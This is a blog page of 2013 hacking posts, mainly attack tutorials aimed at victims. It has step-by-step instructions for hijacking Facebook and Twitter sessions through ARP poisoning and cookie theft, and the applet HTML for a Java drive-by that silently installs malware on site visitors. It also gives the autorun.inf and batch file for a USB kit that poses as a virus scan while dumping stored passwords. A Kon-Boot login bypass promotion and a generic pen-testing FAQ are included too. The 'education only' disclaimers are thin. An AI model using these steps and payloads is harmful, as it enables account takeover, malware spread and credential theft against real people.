Showing posts with label Password Hacking. Show all posts
Showing posts with label Password Hacking. Show all posts

Thursday, November 28, 2013

Hack Windows with KON BOOT v2.1 - Free Download

    Hack Windows with KON BOOT v2.1 - Free Download
Kon-Boot is an application which will silently bypass the authentication process of Windows based operating systems. Without overwriting your old password! Easy to use and excellent for tech repairs, data recovery and security audits.
                              
Commercial Kon-Boot version works with both 64-bit and 32-bit Microsoft Windows operating systems and also include privilege escalation and sticky keys feature.

What's new in version V2.2?
- EFI SUPPORT! (both Windows 8 and Windows 7 support, EFI support on USB only)
- multiple fixes for data loading procedures
- fixes for wrong disk mappings
- completely new kernel-mode loader

Wednesday, November 6, 2013

FAQ Penetration Testing and Pen Testing Distribution

FAQ Penetration Testing and Pen Testing Distribution


Penetration Testing(Pen Testing) is the act of evaluating the Security of system or network 
by exploitingvulnerabilities. This will determine whether unauthorized or malicious activity is possible in a system. Vulnerability uncovered through the Pen Testing will be presented to the system's owner.


Why Penetration Testing?

  • Pentetration testing can identify the vulnerabilities that is not identified by an automated vulnerability scanners.
  • Determining the feasibility of a particular set of attack vectors
  • Determining the Critical Vulerabilities .
  • Assessing the magnitude of potential business and operational impacts of successful attacks
  • Testing the ability of network defenders to successfully detect and respond to the attacks
  • Testing stability of the system against the DDOS attack.




White Box vs Black Box vs Grey Box Testing:

Penetration testing can be performed in different ways. The methods can be classified into three types based on the knowledge about the System being tested.

White Box:
In white box testing, Pen Tester know everything about the system such as source code,network diagrams, ip addressing info.

White box testing simulates what might happen during an "inside job" or after a "leak" of sensitive information, where the attacker(malicious insider) has access to source code, network layouts, and possibly even some passwords.

Black Box:
Pen Tester test the system without prior knowledge about the system. This method is also known as BlindTesting . Black box testing simulates an attack from someone who is unfamiliar(malicious outsiders) with the system.

Grey Box:
In this method, Pen Tester partially know about the system.

Web application penetration testing:
This testing will be used to find the following web application vulnerabilities:

  • SQL Injection
  • XSS(Cross site Scripting)
  • Buffer overflow
  • Clickjacking
  • DDOS
Penetration Testing Tool:
Penetration Testing tools are used as part of a penetration test to automate certain tasks, improve testing efficiency, and discover issues that might be difficult to find using manual analysis techniques alone. 

As a Penetration Tester, you will need lot of Penetration testing tools to test the Security of system. Searching ,downloading and installing the required software may take time. You can use a Penetration Testing Distribution instead.

What is Pen Testing Distribution?
Penetration Testing Distribution is an open source Operating System(Derived from Linux/BSD) thatcombines all required application for testing the security of system. It is specially developed for SecurityProfessionals(Pen Testers/EthicalHackers/Forensic Officers...)
Eg: Backtrack 5 Linux .

What is the advantage of Penetration Testing Distribution?
All Required application for security test are gathered in a single Operating system. You don't need to search for application, Save your time. Penetration Testing Distribution are open source and free to use. You can install in pen drive and bring it anywhere. 

Tuesday, November 5, 2013

Hack Accounts With Cookie Stealing

              Hack Accounts With Cookie Stealing

                                                     

  One of the best and better idea ever to hack any account is to steal cookies and load them..Here is Tutorial for hackeingsoftwarez fans

What Are Cookies ? And What Is The Use Of Stealing Cookies ?

Cookies are small files that stored on users computer by websites when a user visits them. The stored
Cookies are used by the web server to identify and authenticate the user .For example when a user
logins in Facebook a unique string is generated and one copy of it is saved on the server and other is
saved on the users browser as Cookies. Both are matched every time the user does any thing in his
account

So if we steal the victims cookie and inject them in our browser we will be able to imitate the victims
identity to the web server and thus we will be able to login is his account . This is called as Side jacking
.The best thing about this is that we need not no the victims id or password all we need is the victims
cookie.



Hack Facebook / Twitter By Stealing Cookies ?

1. Ettercap or Cain and able for ARP poisoning the victim.
2. Wire shark for sniffing and stealing cookies
3. Firefox browser and Cookie logger addon for injecting the stolen cookies in our browser


1. First ARP poison the victim  computer using Cain and able or Ettercap


2. After ARP poisoning open Wire shark ,click capture button from the menu bar , then selectinterface
.Now select your interface (usually eth0 ) finally click start capture .

3. Now you can see the packets being captured , wait for a while till the victim logs in his account(Facebook /twitter ),

4. Mean while Find the IP address of Facebook ,for this you can open CMD (command prompt ) and
enter .Ping Facebook.com to find its IP address.

5. Now filter the packets by entering the the IP address (Facebook) in the filter bar and click apply

6. Now Locate HTTP Get /home.php and copy all the cookie names and values in a notepad.

7. Now open Firefox and open add and edit cookies addon ,which you downloaded earlier , add all the cookie values and save them.



8. Now open Facebook in a new tab , you will be logged in the victims account .

NOTE: FOR EDUCATION PURPOSE ONLY. HACKING ACCOUNTS IS CRIME. I AM MOT RESPONSIBLE FOR DAMAGE CAUSE BYE U. DO NOT HACK ACCOUNTS IT IS CRIME YOU WILL BE JAIL FOR 40 YEARS. FOR EDUCATION PURPOSE ONLY

NOTE:I have used Linux you can use it on Windows, Process it same and software are same.
Enjoy...!!! any query comment down.

How Hackers Spread Malware Using Java Drive By

   How Hackers Spread Malware Using Java Drive By

Here is the method to spread your worms,virus, key-loggers ,rat servers, etc over the web at a click. This method is used by hackers to spread. Here is the tutorial for all hackerzpositive fanz to spread your worms.

What is Java drive by?

A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this: 
Java Drive by Malware

so lets make it..

Tutorial:-

1. Files Needed you can download from here Download

2. Now save any website as index.html from browser save webpage as option

3. Now make a new folder and copy index file and all files you in the downloaded folder.

4. Now in your maked folder there must be java.jar (main file) , index file , and two pics given in downloaded rar archieve.

5. Open index.html with notepad and copy and paste following code between <body> and </body> tags.:

<applet name='Please Run To Continue width='1' height='1' code='taipans.class' archive='java.jar'><param name="funtime" value="DIRECT LINK HERE"></applet>
Here, replace "DIRECT LINK HERE" with your server direct download link. example:http://example.com/download.exe

6. Save it and Done...!!!

Now your all files are ready upload your maked folder to a free hosting site ot paid if you want.
Now when your victim open ur site he will have to click download then only he will able to go to site and download file is ur virus. you can even merge it with your phishing page.

Use any server from the following to make direct download link:

http://www.dropbox.com
http://freewayhost.net
http://litetb.com
http://sharesend.com
http://www.exehost.net
http://www.largedocument.com
http://www.kiwi6.com
http://www.datafilehost.com
http://www.xup.in

Note some antivirus can detect it..!!!

Do not spread worms and hack account. It is crime. you can get caught by police if you hack accounts. Not My responsibility if you get caught. For Education Purpose Only.

EnjoY..!!!

Monday, November 4, 2013

How to sniff Passwords using USB Drive

               How to sniff Passwords using USB Drive

Anyone can steal stored passwords from any computer and that too by using your USB drive.
Can’t believe!
Read on..
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, MicrosoftOutlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Related Posts Plugin for WordPress, Blogger...